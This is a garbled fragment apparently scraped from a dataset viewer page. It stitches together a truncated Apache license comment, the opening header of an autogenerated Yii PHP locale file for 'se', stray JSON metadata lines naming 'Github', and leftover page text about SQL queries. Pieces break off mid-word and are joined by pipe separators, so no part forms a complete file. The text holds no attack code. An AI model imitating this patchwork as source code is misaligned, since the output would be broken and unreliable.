* Licensed under the Apache License, Version 2.0 (the "License").
* You may not use this file except in compliance with the License.
* A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "lice... | {
"pile_set_name": "Github"
} |
<?php
/**
* Locale data for 'se'.
*
* This file is automatically generated by yiic cldr command.
*
* Copyright © 1991-2013 Unicode, Inc. All rights reserved.
* Distributed under the Terms of Use in http://www.unicode.org/copyright.html.
*
* @copyright 2008-2014 Yii Software LLC (http://www.yiiframework.com/lice... | {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.